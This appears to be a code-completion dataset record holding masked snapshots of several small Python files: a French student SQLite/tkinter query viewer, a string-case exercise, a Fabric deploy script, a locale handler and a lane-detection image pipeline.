répertoire ranger dans le dossier projetsqlKilian.\n renvoie une liste dont chaque élément est le nom d'un des fichier du repertoir.\n \"\"\"\n path = (\n 'C:\\\\Users\\\\Elève\\\\Desktop\\\\projet NSI\\\\projetsqlKilian\\\\projetsqlKilian\\\\'\n + repertoire)\n nom_requete = os.listdir(path)\n return nom_requete\n\n\ndef stocker_requete(dico, repertoire):\n \"\"\"\n prend en argument dico un dictionnaire vide et repertoire le nom du repertoir où sont sockés les requêtes.\n ne renvoie rien\n \"\"\"\n liste = nom_element_du_repertoire(repertoire)\n for i in range(len(liste)):\n requete = separer_requete_et_question(liste[i], repertoire)\n dico[i] = ['#' + str(i + 1) + ') ' + requete[0], requete[1]]\n\n\ndef afficher(dico):\n \"\"\"\n prend en argument un dictionnaire et renvoie ce disctionnaire.\n \"\"\"\n return dico\n\n\n<mask token>\n",
"step-3": "def execute(n, dico):\n \"\"\"\n Prend en argument n, la position de la requête dans le dictionaire et dico le nom du dictionnaire.\n Renvoie une liste dont chaque élément est une réponse de la requête.\n \"\"\"\n l = []\n import sqlite3\n conn = sqlite3.connect('imdb.db')\n c = conn.cursor()\n c.execute(dico[n][1])\n for row in c:\n l.append(row)\n conn.close()\n return l\n\n\ndef taille_plus_grande_reponse(reponses):\n \"\"\"\n Prend en argument une liste.\n Renvoie la taille du plus grand élément de la liste.\n \"\"\"\n l = reponses\n maxi = 0\n for i in range(len(l)):\n if len(str(l[i])) > maxi:\n maxi = len(str(l[i]))\n return maxi\n\n\n<mask token>\n\n\ndef affichage_question(dico, texte, titre='Question'):\n \"\"\"\n prend en argument dico un dictionnaire, texte une liste, et titre une chaine de caractère.\n Renvoie une page tkinter où chaque indice de la liste texte est un bouton clickable et où titre et le nom de la page.\n \"\"\"\n fenetre = tkinter.Tk()\n fenetre.title(titre)\n for i in range(len(texte)):\n bouton = {}\n bouton[i] = Button(fenetre, text=texte[i], command=lambda n=i, dico\n =dico: requete(n, dico))\n bouton[i].pack()\n fenetre.mainloop()\n\n\n<mask token>\n\n\ndef requete(n, dico):\n \"\"\"\n prend en argument n l'indice de la requête dans le dictionnaire et dico un dictionnaire.\n ne renvoie rien\n \"\"\"\n r = execute(n, dico)\n afficher_table(execute(n, dico), dico[n][0])\n\n\n<mask token>\n\n\ndef afficher_table(table, titre='', debut=0, fin=None):\n \"\"\"\n prend en argument table une liste et titre une chaine de caractère.\n ne renvoie rien.\n \"\"\"\n if titre != '':\n titre += '\\n\\n'\n affichage(titre + texte_table(table, debut, fin), titre)\n\n\ndef texte_table(table, debut=0, fin=None):\n \"\"\"\n prend en argument table une liste.\n renvoie une chaîne de caractère composé d'un tableau avec dans chaque case un élement de table.\n \"\"\"\n max = taille_plus_grande_reponse(table)\n texte = '+' + max * '-' + '+\\n'\n for i in range(len(table)):\n texte = texte + '|' + str(table[i]) + (max - len(str(table[i]))\n ) * ' ' + '|' + '\\n+' + max * '-' + '+\\n'\n return texte\n\n\n<mask token>\n\n\ndef fichier_txt_en_texte(fichier):\n \"\"\"\n prend en argument le chemin d'un fichier texte\n Renvoie le contenu du fichier texte sous forme de chaîne de caractère.\n \"\"\"\n with open(fichier, 'r') as requete:\n return requete.read()\n\n\ndef chemin(nom, repertoire):\n \"\"\"\n Prend en argument le nom du fichier où est stocké la requête et le nom du répertoire dans lequel est stocké la requête.\n Renvoie le chemin de la requête.\n \"\"\"\n return repertoire + '/' + nom\n\n\ndef texte_en_liste(nom_requete, repertoire):\n requete = fichier_txt_en_texte(chemin(nom_requete, repertoire))\n return requete.split()\n\n\n<mask token>\n\n\ndef creer_dictionnaire_vide():\n \"\"\"\n Ne contient aucun argument et renvoie un dictionnaire vide.\n \"\"\"\n dico = {}\n return dico\n\n\ndef nom_element_du_repertoire(repertoire):\n \"\"\"\n prend en argument le nom d'un répertoire ranger dans le dossier projetsqlKilian.\n renvoie une liste dont chaque élément est le nom d'un des fichier du repertoir.\n \"\"\"\n path = (\n 'C:\\\\Users\\\\Elève\\\\Desktop\\\\projet NSI\\\\projetsqlKilian\\\\projetsqlKilian\\\\'\n + repertoire)\n nom_requete = os.listdir(path)\n return nom_requete\n\n\ndef stocker_requete(dico, repertoire):\n \"\"\"\n prend en argument dico un dictionnaire vide et repertoire le nom du repertoir où sont sockés les requêtes.\n ne renvoie rien\n \"\"\"\n liste = nom_element_du_repertoire(repertoire)\n for i in range(len(liste)):\n requete = separer_requete_et_question(liste[i], repertoire)\n dico[i] = ['#' + str(i + 1) + ') ' + requete[0], requete[1]]\n\n\ndef afficher(dico):\n \"\"\"\n prend en argument un dictionnaire et renvoie ce disctionnaire.\n \"\"\"\n return dico\n\n\n<mask token>\n",
"step-4": "def execute(n, dico):\n \"\"\"\n Prend en argument n, la position de la requête dans le dictionaire et dico le nom du dictionnaire.\n Renvoie une liste dont chaque élément est une réponse de la requête.\n \"\"\"\n l = []\n import sqlite3\n conn = sqlite3.connect('imdb.db')\n c = conn.cursor()\n c.execute(dico[n][1])\n for row in c:\n l.append(row)\n conn.close()\n return l\n\n\ndef taille_plus_grande_reponse(reponses):\n \"\"\"\n Prend en argument une liste.\n Renvoie la taille du plus grand élément de la liste.\n \"\"\"\n l = reponses\n maxi = 0\n for i in range(len(l)):\n if len(str(l[i])) > maxi:\n maxi = len(str(l[i]))\n return maxi\n\n\n<mask token>\n\n\ndef affichage_question(dico, texte, titre='Question'):\n \"\"\"\n prend en argument dico un dictionnaire, texte une liste, et titre une chaine de caractère.\n Renvoie une page tkinter où chaque indice de la liste texte est un bouton clickable et où titre et le nom de la page.\n \"\"\"\n fenetre = tkinter.Tk()\n fenetre.title(titre)\n for i in range(len(texte)):\n bouton = {}\n bouton[i] = Button(fenetre, text=texte[i], command=lambda n=i, dico\n =dico: requete(n, dico))\n bouton[i].pack()\n fenetre.mainloop()\n\n\n<mask token>\n\n\ndef requete(n, dico):\n \"\"\"\n prend en argument n l'indice de la requête dans le dictionnaire et dico un dictionnaire.\n ne renvoie rien\n \"\"\"\n r = execute(n, dico)\n afficher_table(execute(n, dico), dico[n][0])\n\n\n<mask token>\n\n\ndef afficher_table(table, titre='', debut=0, fin=None):\n \"\"\"\n prend en argument table une liste et titre une chaine de caractère.\n ne renvoie rien.\n \"\"\"\n if titre != '':\n titre += '\\n\\n'\n affichage(titre + texte_table(table, debut, fin), titre)\n\n\ndef texte_table(table, debut=0, fin=None):\n \"\"\"\n prend en argument table une liste.\n renvoie une chaîne de caractère composé d'un tableau avec dans chaque case un élement de table.\n \"\"\"\n max = taille_plus_grande_reponse(table)\n texte = '+' + max * '-' + '+\\n'\n for i in range(len(table)):\n texte = texte + '|' + str(table[i]) + (max - len(str(table[i]))\n ) * ' ' + '|' + '\\n+' + max * '-' + '+\\n'\n return texte\n\n\n<mask token>\n\n\ndef fichier_txt_en_texte(fichier):\n \"\"\"\n prend en argument le chemin d'un fichier texte\n Renvoie le contenu du fichier texte sous forme de chaîne de caractère.\n \"\"\"\n with open(fichier, 'r') as requete:\n return requete.read()\n\n\ndef chemin(nom, repertoire):\n \"\"\"\n Prend en argument le nom du fichier où est stocké la requête et le nom du répertoire dans lequel est stocké la requête.\n Renvoie le chemin de la requête.\n \"\"\"\n return repertoire + '/' + nom\n\n\ndef texte_en_liste(nom_requete, repertoire):\n requete = fichier_txt_en_texte(chemin(nom_requete, repertoire))\n return requete.split()\n\n\ndef liste_en_texte(liste):\n \"\"\"\n prend en argument une liste et un indice et renvoie la même liste mais l'élement d'indice 'n' est transformé en texte.\n \"\"\"\n texte = ''\n for i in range(len(liste)):\n texte = texte + str(liste[i]) + ' '\n return texte\n\n\n<mask token>\n\n\ndef creer_dictionnaire_vide():\n \"\"\"\n Ne contient aucun argument et renvoie un dictionnaire vide.\n \"\"\"\n dico = {}\n return dico\n\n\ndef nom_element_du_repertoire(repertoire):\n \"\"\"\n prend en argument le nom d'un répertoire ranger dans le dossier projetsqlKilian.\n renvoie une liste dont chaque élément est le nom d'un des fichier du repertoir.\n \"\"\"\n path = (\n 'C:\\\\Users\\\\Elève\\\\Desktop\\\\projet NSI\\\\projetsqlKilian\\\\projetsqlKilian\\\\'\n + repertoire)\n nom_requete = os.listdir(path)\n return nom_requete\n\n\ndef stocker_requete(dico, repertoire):\n \"\"\"\n prend en argument dico un dictionnaire vide et repertoire le nom du repertoir où sont sockés les requêtes.\n ne renvoie rien\n \"\"\"\n liste = nom_element_du_repertoire(repertoire)\n for i in range(len(liste)):\n requete = separer_requete_et_question(liste[i], repertoire)\n dico[i] = ['#' + str(i + 1) + ') ' + requete[0], requete[1]]\n\n\ndef afficher(dico):\n \"\"\"\n prend en argument un dictionnaire et renvoie ce disctionnaire.\n \"\"\"\n return dico\n\n\n<mask token>\n",
"step-5": "def execute(n,dico):\n \"\"\"\n Prend en argument n, la position de la requête dans le dictionaire et dico le nom du dictionnaire.\n Renvoie une liste dont chaque élément est une réponse de la requête.\n \"\"\"\n l = []\n import sqlite3\n conn = sqlite3.connect('imdb.db')\n c = conn.cursor()\n c.execute(dico[n][1])\n for row in c:\n l.append(row)\n conn.close()\n return l\n\ndef taille_plus_grande_reponse(reponses):\n \"\"\"\n Prend en argument une liste.\n Renvoie la taille du plus grand élément de la liste.\n \"\"\"\n l = reponses\n maxi = 0\n for i in range(len(l)):\n if len(str(l[i])) > maxi:\n maxi = len(str(l[i]))\n return maxi\n\n\"\"\"affichage question\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nfrom tkinter import *\n\ndef question(dico):\n \"\"\"\n prend en argument un disctionnaire.\n Ne renvoie rien.\n \"\"\"\n l = []\n for i in range(len(dico)):\n l.append(dico[i][0])\n affichage_question(dico,l)\n\ndef affichage_question(dico, texte, titre = \"Question\"):\n \"\"\"\n prend en argument dico un dictionnaire, texte une liste, et titre une chaine de caractère.\n Renvoie une page tkinter où chaque indice de la liste texte est un bouton clickable et où titre et le nom de la page.\n \"\"\"\n fenetre = tkinter.Tk()\n fenetre.title(titre)\n for i in range(len(texte)):\n bouton={}\n bouton[i]=Button(fenetre, text=texte[i], command=lambda n=i, dico=dico:requete(n,dico))\n bouton[i].pack()\n\n\n fenetre.mainloop()\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\ndef requete(n,dico):\n \"\"\"\n prend en argument n l'indice de la requête dans le dictionnaire et dico un dictionnaire.\n ne renvoie rien\n \"\"\"\n r = execute(n,dico)\n afficher_table(execute(n,dico),dico[n][0])\n\nimport tkinter\nimport os\n\ndef afficher_table(table, titre =\"\", debut = 0, fin = None):\n \"\"\"\n prend en argument table une liste et titre une chaine de caractère.\n ne renvoie rien.\n \"\"\"\n if titre != \"\":\n\t titre += \"\\n\\n\"\n\t#print(titre + texte_table(table, debut, fin))\n affichage(titre + texte_table(table, debut, fin), titre)\n \ndef texte_table(table, debut = 0, fin = None):\n \"\"\"\n prend en argument table une liste.\n renvoie une chaîne de caractère composé d'un tableau avec dans chaque case un élement de table.\n \"\"\"\n max = taille_plus_grande_reponse(table)\n texte = '+' + max * '-' + '+\\n'\n for i in range(len(table)):\n texte = texte + '|' + str(table[i]) + (max - len(str(table[i]))) * ' ' + '|' + '\\n+' + max * '-' + '+\\n'\n return texte\n\ndef affichage(texte, titre = \"Requêtes tables\"):\n \"\"\"\n prend en argument texte une chaîne de caractère et titre une chaine de caractère\n renvoie une fenêtre tkinter\n \"\"\"\n root = tkinter.Tk()\n root.title(str(titre))\n RWidth=root.winfo_screenwidth() - 100\n RHeight=root.winfo_screenheight() - 100\n root.geometry(\"%dx%d+50+0\"%(RWidth, RHeight))\n text=tkinter.Text(root, wrap = 'none')\n scroll_x=tkinter.Scrollbar(text.master, orient='horizontal', command = text.xview)\n scroll_x.config(command = text.xview)\n text.configure(xscrollcommand = scroll_x.set)\n scroll_x.pack(side = 'bottom', fill = 'x', anchor = 'w')\n scroll_y = tkinter.Scrollbar(text.master)\n scroll_y.config(command = text.yview)\n text.configure(yscrollcommand = scroll_y.set)\n scroll_y.pack(side = tkinter.RIGHT, fill = 'y')\n text.insert(\"1.0\", texte)\n text.pack(side = tkinter.LEFT, expand = True, fill = tkinter.BOTH)\n root.mainloop()\n\ndef fichier_txt_en_texte(fichier):\n \"\"\"\n prend en argument le chemin d'un fichier texte\n Renvoie le contenu du fichier texte sous forme de chaîne de caractère.\n \"\"\"\n with open(fichier, \"r\") as requete:\n return requete.read()\n\ndef chemin(nom, repertoire):\n \"\"\"\n Prend en argument le nom du fichier où est stocké la requête et le nom du répertoire dans lequel est stocké la requête.\n Renvoie le chemin de la requête.\n \"\"\"\n return repertoire + '/' + nom\n\ndef texte_en_liste(nom_requete, repertoire):\n requete = fichier_txt_en_texte(chemin(nom_requete, repertoire))\n return requete.split()\n\ndef liste_en_texte(liste):\n \"\"\"\n prend en argument une liste et un indice et renvoie la même liste mais l'élement d'indice 'n' est transformé en texte.\n \"\"\"\n texte = \"\"\n for i in range(len(liste)):\n texte = texte + str(liste[i]) + \" \"\n return texte\n \ndef separer_requete_et_question(nom, repertoire):\n \"\"\"\n prend en argument le numéro de la requête et renvoie la question et la requête sésparé.\n \"\"\"\n requete = texte_en_liste(nom, repertoire) #transforme la requête en tableau\n question = \"\"\n for i in range(len(requete)): #cherche le moment où la question s'arrête et sépare la question de la requête\n if requete[i] == \"?\":\n question = requete[0:i+1] #stock la question\n requete = requete[i+1:len(requete)] #stock la réponse\n break #stop la boucle quand la \"?\" est trouvé\n return [liste_en_texte(question),liste_en_texte(requete)]\n\ndef creer_dictionnaire_vide():\n \"\"\"\n Ne contient aucun argument et renvoie un dictionnaire vide.\n \"\"\"\n dico = {}\n return dico\n\ndef nom_element_du_repertoire(repertoire):\n \"\"\"\n prend en argument le nom d'un répertoire ranger dans le dossier projetsqlKilian.\n renvoie une liste dont chaque élément est le nom d'un des fichier du repertoir.\n \"\"\"\n path = \"C:\\\\Users\\\\Elève\\\\Desktop\\\\projet NSI\\\\projetsqlKilian\\\\projetsqlKilian\\\\\" + repertoire\n nom_requete = os.listdir(path) \n return nom_requete\n\ndef stocker_requete(dico, repertoire):\n \"\"\"\n prend en argument dico un dictionnaire vide et repertoire le nom du repertoir où sont sockés les requêtes.\n ne renvoie rien\n \"\"\"\n liste = nom_element_du_repertoire(repertoire)\n for i in range(len(liste)):\n requete = separer_requete_et_question(liste[i], repertoire)\n dico[i] = ['#' + str(i+1) + ') ' + requete[0], requete[1]]\n \n \ndef afficher(dico):\n \"\"\"\n prend en argument un dictionnaire et renvoie ce disctionnaire.\n \"\"\"\n return dico\n\na = creer_dictionnaire_vide()\nstocker_requete(a,'requête')\n#print(afficher(a))\nquestion(a)\n#print(nom_element_du_repertoire('requête'))\n#requete(a)\n#print(execute(1,a))\n#print(taille_plus_grande_reponse(execute(1,a)))",
"step-ids": [
8,
11,
13,
14,
21
]
}
|
[
8,
11,
13,
14,
21
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for char in string:
if char.isupper():
upp_regist += 1
elif char.islower():
low_regist += 1
print('Some string:', string)
if upp_regist > low_regist:
print('Some edited string:', string.upper())
elif low_regist > upp_regist:
print('Some edited string:', string.lower())
else:
print('Some edited string:', string.swapcase())
print('Some string:', string)
if string.istitle():
print('Some edited string: done. ' + string)
else:
print('Some edited string:', string.replace('Lorem', 'draft: '))
print('Some string:', string)
if len(string) > 20:
string = string[:20]
print('Some edited string:', string)
else:
print('Some edited string:', string.ljust(20, '@'))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
string = 'Lorem, Ipsum, Is, SImPlY, DuMMy, TEXT, Of, The, Printing, INDUSTRY.'
upp_regist = low_regist = title_regist = 0
for char in string:
if char.isupper():
upp_regist += 1
elif char.islower():
low_regist += 1
print('Some string:', string)
if upp_regist > low_regist:
print('Some edited string:', string.upper())
elif low_regist > upp_regist:
print('Some edited string:', string.lower())
else:
print('Some edited string:', string.swapcase())
print('Some string:', string)
if string.istitle():
print('Some edited string: done. ' + string)
else:
print('Some edited string:', string.replace('Lorem', 'draft: '))
print('Some string:', string)
if len(string) > 20:
string = string[:20]
print('Some edited string:', string)
else:
print('Some edited string:', string.ljust(20, '@'))
<|reserved_special_token_1|>
"""
1. Если в строке больше символов в нижнем регистре - вывести все в нижнем,
если больше в верхнем - вывести все в верхнем,
если поровну - вывести в противоположных регистрах.
2. Если в строке каждое слово начинается с заглавной буквы, тогда
добавить в начало строки 'done. '.
Иначе заменить первые 5 элементов строки на 'draft: '.
(можно использовать метод replace и/или конкатенацию строк + срезы)
3. Если длина строки больше 20, то обрезать лишние символы до 20.
Иначе дополнить строку символами '@' до длины 20.
(можно использовать метод ljust либо конкатенацию и дублирование (+ и *))
После выполнения кажого пункта выводить результат типа:
1. Исходная строка: "some string".
Результат: "some edited string".
(Использовать форматирование строк f либо метод format)
"""
string = 'Lorem, Ipsum, Is, SImPlY, DuMMy, TEXT, Of, The, Printing, INDUSTRY.'
upp_regist = low_regist = title_regist = 0
for char in string:
if char.isupper():
upp_regist += 1
elif char.islower():
low_regist += 1
print('Some string:', string)
if upp_regist > low_regist:
print('Some edited string:', string.upper())
elif low_regist > upp_regist:
print('Some edited string:', string.lower())
else:
print('Some edited string:', string.swapcase())
print('Some string:', string)
if string.istitle():
print('Some edited string: done. ' + string)
else:
print('Some edited string:', string.replace('Lorem', 'draft: '))
print('Some string:', string)
if len(string) > 20:
string = string[:20]
print('Some edited string:', string)
else:
print('Some edited string:', string.ljust(20, '@'))
|
flexible
|
{
"blob_id": "c7c405535b2ca656d4d5f18013e3e2fdef70efea",
"index": 8088,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor char in string:\n if char.isupper():\n upp_regist += 1\n elif char.islower():\n low_regist += 1\nprint('Some string:', string)\nif upp_regist > low_regist:\n print('Some edited string:', string.upper())\nelif low_regist > upp_regist:\n print('Some edited string:', string.lower())\nelse:\n print('Some edited string:', string.swapcase())\nprint('Some string:', string)\nif string.istitle():\n print('Some edited string: done. ' + string)\nelse:\n print('Some edited string:', string.replace('Lorem', 'draft: '))\nprint('Some string:', string)\nif len(string) > 20:\n string = string[:20]\n print('Some edited string:', string)\nelse:\n print('Some edited string:', string.ljust(20, '@'))\n",
"step-3": "<mask token>\nstring = 'Lorem, Ipsum, Is, SImPlY, DuMMy, TEXT, Of, The, Printing, INDUSTRY.'\nupp_regist = low_regist = title_regist = 0\nfor char in string:\n if char.isupper():\n upp_regist += 1\n elif char.islower():\n low_regist += 1\nprint('Some string:', string)\nif upp_regist > low_regist:\n print('Some edited string:', string.upper())\nelif low_regist > upp_regist:\n print('Some edited string:', string.lower())\nelse:\n print('Some edited string:', string.swapcase())\nprint('Some string:', string)\nif string.istitle():\n print('Some edited string: done. ' + string)\nelse:\n print('Some edited string:', string.replace('Lorem', 'draft: '))\nprint('Some string:', string)\nif len(string) > 20:\n string = string[:20]\n print('Some edited string:', string)\nelse:\n print('Some edited string:', string.ljust(20, '@'))\n",
"step-4": "\"\"\"\n 1. Если в строке больше символов в нижнем регистре - вывести все в нижнем,\n если больше в верхнем - вывести все в верхнем,\n если поровну - вывести в противоположных регистрах.\n 2. Если в строке каждое слово начинается с заглавной буквы, тогда\n добавить в начало строки 'done. '.\n Иначе заменить первые 5 элементов строки на 'draft: '.\n (можно использовать метод replace и/или конкатенацию строк + срезы)\n 3. Если длина строки больше 20, то обрезать лишние символы до 20.\n Иначе дополнить строку символами '@' до длины 20.\n (можно использовать метод ljust либо конкатенацию и дублирование (+ и *))\n После выполнения кажого пункта выводить результат типа:\n 1. Исходная строка: \"some string\".\n Результат: \"some edited string\".\n (Использовать форматирование строк f либо метод format)\n\"\"\"\n\nstring = 'Lorem, Ipsum, Is, SImPlY, DuMMy, TEXT, Of, The, Printing, INDUSTRY.'\n\nupp_regist = low_regist = title_regist = 0\n\nfor char in string:\n if char.isupper():\n upp_regist += 1\n elif char.islower():\n low_regist += 1\n\nprint('Some string:', string)\nif upp_regist > low_regist:\n print('Some edited string:', string.upper())\nelif low_regist > upp_regist:\n print('Some edited string:', string.lower())\nelse:\n print('Some edited string:', string.swapcase())\n\nprint('Some string:', string)\nif string.istitle():\n print('Some edited string: done. ' + string)\nelse:\n print('Some edited string:', string.replace('Lorem', 'draft: '))\n\nprint('Some string:', string)\nif len(string) > 20:\n string = string[:20]\n print('Some edited string:', string)\nelse:\n print('Some edited string:', string.ljust(20, '@'))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def deploy():
print('deploying')
pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def pack():
local('git checkout')
local('git commit -a -s -m "Fabric Pack Commit"')
def deploy():
print('deploying')
pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
AWS_EC2_01 = 'ec2-52-78-143-155.ap-northeast-2.compute.amazonaws.com'
PROJECT_DIR = '/var/www/kamper'
APP_DIR = '%s/app' % PROJECT_DIR
<|reserved_special_token_0|>
env.user = 'kamper'
env.hosts = [AWS_EC2_01]
env.key_filename = (
'/Users/Mac/Desktop/Genus/1.제품_서비스/KAMP/dev/flask_kamper_package/KAMPERKOREA.pem'
)
def pack():
local('git checkout')
local('git commit -a -s -m "Fabric Pack Commit"')
def deploy():
print('deploying')
pass
<|reserved_special_token_1|>
from fabric.api import *
AWS_EC2_01 = 'ec2-52-78-143-155.ap-northeast-2.compute.amazonaws.com'
PROJECT_DIR = '/var/www/kamper'
APP_DIR = '%s/app' % PROJECT_DIR
<|reserved_special_token_0|>
env.user = 'kamper'
env.hosts = [AWS_EC2_01]
env.key_filename = (
'/Users/Mac/Desktop/Genus/1.제품_서비스/KAMP/dev/flask_kamper_package/KAMPERKOREA.pem'
)
def pack():
local('git checkout')
local('git commit -a -s -m "Fabric Pack Commit"')
def deploy():
print('deploying')
pass
<|reserved_special_token_1|>
# fabric이 실행할 대상을 제어.
from fabric.api import *
AWS_EC2_01 = 'ec2-52-78-143-155.ap-northeast-2.compute.amazonaws.com' # Running
PROJECT_DIR = '/var/www/kamper'
APP_DIR = '%s/app' % PROJECT_DIR
"""
# the user to use for the remote commands
env.user = 'appuser'
# the servers where the commands are executed
env.hosts = ['server1.example.com', 'server2.example.com']
"""
env.user = 'kamper'
env.hosts = [AWS_EC2_01]
env.key_filename = '/Users/Mac/Desktop/Genus/1.제품_서비스/KAMP/dev/flask_kamper_package/KAMPERKOREA.pem'
def pack():
# create a new source distribution as tarball
local('git checkout')
# local('git add *')
local('git commit -a -s -m "Fabric Pack Commit"')
# local('git push origin master', capture=False)
def deploy():
print('deploying')
pass
# with settings(warn_only=True):
# with cd(APP_DIR):
# run('sudo ./deploy.sh')
|
flexible
|
{
"blob_id": "98db990f406cc6815480cca33011c8b0b2ad67c7",
"index": 2343,
"step-1": "<mask token>\n\n\ndef deploy():\n print('deploying')\n pass\n",
"step-2": "<mask token>\n\n\ndef pack():\n local('git checkout')\n local('git commit -a -s -m \"Fabric Pack Commit\"')\n\n\ndef deploy():\n print('deploying')\n pass\n",
"step-3": "<mask token>\nAWS_EC2_01 = 'ec2-52-78-143-155.ap-northeast-2.compute.amazonaws.com'\nPROJECT_DIR = '/var/www/kamper'\nAPP_DIR = '%s/app' % PROJECT_DIR\n<mask token>\nenv.user = 'kamper'\nenv.hosts = [AWS_EC2_01]\nenv.key_filename = (\n '/Users/Mac/Desktop/Genus/1.제품_서비스/KAMP/dev/flask_kamper_package/KAMPERKOREA.pem'\n )\n\n\ndef pack():\n local('git checkout')\n local('git commit -a -s -m \"Fabric Pack Commit\"')\n\n\ndef deploy():\n print('deploying')\n pass\n",
"step-4": "from fabric.api import *\nAWS_EC2_01 = 'ec2-52-78-143-155.ap-northeast-2.compute.amazonaws.com'\nPROJECT_DIR = '/var/www/kamper'\nAPP_DIR = '%s/app' % PROJECT_DIR\n<mask token>\nenv.user = 'kamper'\nenv.hosts = [AWS_EC2_01]\nenv.key_filename = (\n '/Users/Mac/Desktop/Genus/1.제품_서비스/KAMP/dev/flask_kamper_package/KAMPERKOREA.pem'\n )\n\n\ndef pack():\n local('git checkout')\n local('git commit -a -s -m \"Fabric Pack Commit\"')\n\n\ndef deploy():\n print('deploying')\n pass\n",
"step-5": "# fabric이 실행할 대상을 제어.\n\nfrom fabric.api import *\n\nAWS_EC2_01 = 'ec2-52-78-143-155.ap-northeast-2.compute.amazonaws.com' # Running\n\n\nPROJECT_DIR = '/var/www/kamper'\n\nAPP_DIR = '%s/app' % PROJECT_DIR\n\n\"\"\"\n\n# the user to use for the remote commands\nenv.user = 'appuser'\n\n# the servers where the commands are executed\nenv.hosts = ['server1.example.com', 'server2.example.com']\n\n\"\"\"\n\n\nenv.user = 'kamper'\nenv.hosts = [AWS_EC2_01]\nenv.key_filename = '/Users/Mac/Desktop/Genus/1.제품_서비스/KAMP/dev/flask_kamper_package/KAMPERKOREA.pem'\n\n\ndef pack():\n # create a new source distribution as tarball\n local('git checkout')\n # local('git add *')\n local('git commit -a -s -m \"Fabric Pack Commit\"')\n\n\n # local('git push origin master', capture=False)\n\n\ndef deploy():\n print('deploying')\n pass\n\n # with settings(warn_only=True):\n # with cd(APP_DIR):\n # run('sudo ./deploy.sh')\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from mx.handlers import MainHandler
# handler for changing app language
class Locale(MainHandler):
"""
handles requests to change LOCALE or language for internationalization.
"""
def get(self):
locale = self.request.get('locale')
if not locale :
locale = LOCALE
locale = locale[:2].lower()+'_'+locale[-2:].upper()
if self.switch_locale(locale):
if self.local_user and self.local_user.locale != locale:
u = LocalUser.by_id(self.local_user.key.id())
u.locale = locale
u.put()
self.write_json({'done':True})
else:
self.write_json({'done':False})
# home page handler
class MainPage(MainHandler):
def get(self):
self.render('home.html')
def post(self):
pw = self.request.get('pw')
|
normal
|
{
"blob_id": "bdcbb946dadf168149342c651ad03eaf4b748401",
"index": 6803,
"step-1": "<mask token>\n\n\nclass Locale(MainHandler):\n <mask token>\n <mask token>\n\n\nclass MainPage(MainHandler):\n\n def get(self):\n self.render('home.html')\n\n def post(self):\n pw = self.request.get('pw')\n",
"step-2": "<mask token>\n\n\nclass Locale(MainHandler):\n <mask token>\n\n def get(self):\n locale = self.request.get('locale')\n if not locale:\n locale = LOCALE\n locale = locale[:2].lower() + '_' + locale[-2:].upper()\n if self.switch_locale(locale):\n if self.local_user and self.local_user.locale != locale:\n u = LocalUser.by_id(self.local_user.key.id())\n u.locale = locale\n u.put()\n self.write_json({'done': True})\n else:\n self.write_json({'done': False})\n\n\nclass MainPage(MainHandler):\n\n def get(self):\n self.render('home.html')\n\n def post(self):\n pw = self.request.get('pw')\n",
"step-3": "<mask token>\n\n\nclass Locale(MainHandler):\n \"\"\"\n handles requests to change LOCALE or language for internationalization.\n \"\"\"\n\n def get(self):\n locale = self.request.get('locale')\n if not locale:\n locale = LOCALE\n locale = locale[:2].lower() + '_' + locale[-2:].upper()\n if self.switch_locale(locale):\n if self.local_user and self.local_user.locale != locale:\n u = LocalUser.by_id(self.local_user.key.id())\n u.locale = locale\n u.put()\n self.write_json({'done': True})\n else:\n self.write_json({'done': False})\n\n\nclass MainPage(MainHandler):\n\n def get(self):\n self.render('home.html')\n\n def post(self):\n pw = self.request.get('pw')\n",
"step-4": "from mx.handlers import MainHandler\n\n\nclass Locale(MainHandler):\n \"\"\"\n handles requests to change LOCALE or language for internationalization.\n \"\"\"\n\n def get(self):\n locale = self.request.get('locale')\n if not locale:\n locale = LOCALE\n locale = locale[:2].lower() + '_' + locale[-2:].upper()\n if self.switch_locale(locale):\n if self.local_user and self.local_user.locale != locale:\n u = LocalUser.by_id(self.local_user.key.id())\n u.locale = locale\n u.put()\n self.write_json({'done': True})\n else:\n self.write_json({'done': False})\n\n\nclass MainPage(MainHandler):\n\n def get(self):\n self.render('home.html')\n\n def post(self):\n pw = self.request.get('pw')\n",
"step-5": "\nfrom mx.handlers import MainHandler\n\n# handler for changing app language\nclass Locale(MainHandler):\n \"\"\"\n handles requests to change LOCALE or language for internationalization.\n \"\"\"\n def get(self):\n locale = self.request.get('locale')\n if not locale :\n locale = LOCALE\n locale = locale[:2].lower()+'_'+locale[-2:].upper()\n if self.switch_locale(locale):\n if self.local_user and self.local_user.locale != locale:\n u = LocalUser.by_id(self.local_user.key.id())\n u.locale = locale\n u.put()\n self.write_json({'done':True})\n else:\n self.write_json({'done':False})\n\n\n# home page handler\nclass MainPage(MainHandler):\n def get(self):\n self.render('home.html')\n\n def post(self):\n pw = self.request.get('pw')\n \n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
def create_dir(directory):
if not os.path.exists(directory):
os.makedirs(directory)
def get_full_paths_to_files(files_dir, filenames):
return [os.path.join(files_dir, f) for f in filenames]
def process_images(im_filenames, cg, params):
finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)
images = (mpimg.imread(fname) for fname in im_filenames)
return (find_and_draw_lanes(im) for im in images)
def save_images(images, destination_filenames):
for fname, im in zip(destination_filenames, images):
mpimg.imsave(fname, im)
<|reserved_special_token_0|>
def visualize_pipeline(fname_dst, cg=COMP_GRAPH, params=DEFAULT_PARAMS):
runner = CompGraphRunner(cg, frozen_tokens=params)
ag = to_agraph(runner.token_manager.to_networkx())
ag.layout('dot')
ag.draw(fname_dst)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def create_dir(directory):
if not os.path.exists(directory):
os.makedirs(directory)
def get_full_paths_to_files(files_dir, filenames):
